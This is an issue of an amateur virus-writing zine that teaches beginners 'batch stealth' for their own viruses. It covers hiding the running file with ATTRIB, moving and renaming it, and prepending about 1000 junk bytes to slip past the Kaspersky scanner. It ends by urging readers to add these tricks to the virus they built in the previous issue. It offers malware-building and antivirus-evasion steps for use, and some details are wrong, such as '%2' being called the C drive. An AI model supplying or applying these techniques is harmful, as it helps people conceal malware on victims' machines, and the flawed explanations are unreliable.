 
 **********   ******   ****  **             **
 ***********  ******  ******  **           **
 **      ***    **   **    **  **         **
 **********     **   **         **       **
 *********      **   **          **     **
 **     **      **   **    **     **   **
 **     ***   ******  ******       ** **
 **     ****  ******   ****         ***
 Magazine 2 Batch stealth beginers


Everyone has the right to freedom of opinion and expression
this right includes freedom to hold opinions without interference
and to seek receive and impart information and ideas througt
any media and regardless of frontiers. 
Article 19 of Universal Declaration of Human Rights

                              
<---------------------------<Batch stealth>----------------------------->

can Batch stealth be done yes it can now i know your going to ask me how

<----------------------------<HIDDEN CODE>------------------------------------->

ATTRIB +h %0

<------------------------------<TECHNICAl DETAILS>---------------------->

ATTRIB is attributes

+ is sets an attribute

h is hidden file  attributes

%0 is the file

<----------------------------<MOVE CODE>------------------------------------->

MOVE %0 %2\987.bat

<------------------------------<TECHNICAl DETAILS>---------------------->

MOVE is MOVE the file

%0 is the file 

%2\ is C drive

987.bat is the file wot wos MOVE and rename (the 987.bat can be wot you wunt it to be name)

<---------------------------------------------<FAKE BYTES>------------------------------------>

This is a special Anti-KAV  technique. Maybe you know, that KAV only
searchs in the first 1000 Bytes for the batch  virus Includeing 1000 fake Byte should not
  be a serious problem. Because of the fact, that batch ignore simple input-errors

so wot do we do at the start of your Virus add 1000 fake Bytes


stjrdnfuqlgmpuwefguowyakzxgkxolraxozihswcfngwkpaolmmyfrzmsxbcnvrmwrtnjpwybshmhxjtimvzwjuoakncjwynilyp
zciptpriqzrfqkqwgfiqpivuityndlqmlivmdtkjuynjdxzmpjedfjacsqgybiwcamxxxwolzzkprquufavkqfdyuqjcxvpizrakx
pdmogwizgfrjhvxrmeewywmknxbqbthypeksxmywlfaijracwftfsflicvgfwqzsnrductwbvvtkkzerzgpcbzkngktcdfybzsnby
emlcctvneufmhnvfsutoqnldznssinuqigrxbzyxwfmblnqhxztsokqyldnimzgjsmqwshasowgjrmwldkikgjwuffflhwugwrbqd
qhbueiaahtvwmhfrhntudpvscpkiftyiwceboltowopsojwxbuarilavnacqlljixreykldgdqxdckayqztleotrbijiwzpesheyd
cweyfyrldgvwkcocrqfqtlxuchxdhkpddokhpvxcihqshgqnpjoeqlxspcncyzlvkywzbtijvuiazhevcorognwzgscmmcappqrzw
vmtjkatslrkzxrrwxiawspgfvwwphueigwostqtuwrsabmlsrugeudglkmadpimsdbhsmhzlqtcaqftezwbaqrlkzjnzdhvhrpgbi
ajbakariwolazvdwhskrdsyqqcjayyqwusubevwumtwysahdzxtqhausneeistduraaaozircfrxqaidvarbiwibwzbtjajurezzd
wvqswebffznuymcvqhitlgknfdlwbzdlxfikprozaaxynlxhtmcflbnptelhpgpymekdijonvhyiswpgprdhxtffzimxrdofzonaz
qficniylakfqrazsqqviidufwfuwcialsryemswoekufgliuyybgzdydtqfmqnfqwdxmztbzqultebjbahjcadmibazhxsqljsslv
cqqqtsqfndkcwihitiscoqqsphuooymtkolmjdielrslulfpqodcitauueorvbyohxhmwgfwozxkggipmgpkoutzykratrhamqbxj


<--------------------------------------------------------------------------------------------------->



in Magazine 1 you wos doing code adder as i ask you to do now git your Virus code and add 
FAKE BYTES,HIDDEN CODE or MOVE CODE 1 of the 3 to your Virus i know it not looking good but it going to soon in Magazine 3





sorry about my english spelling :)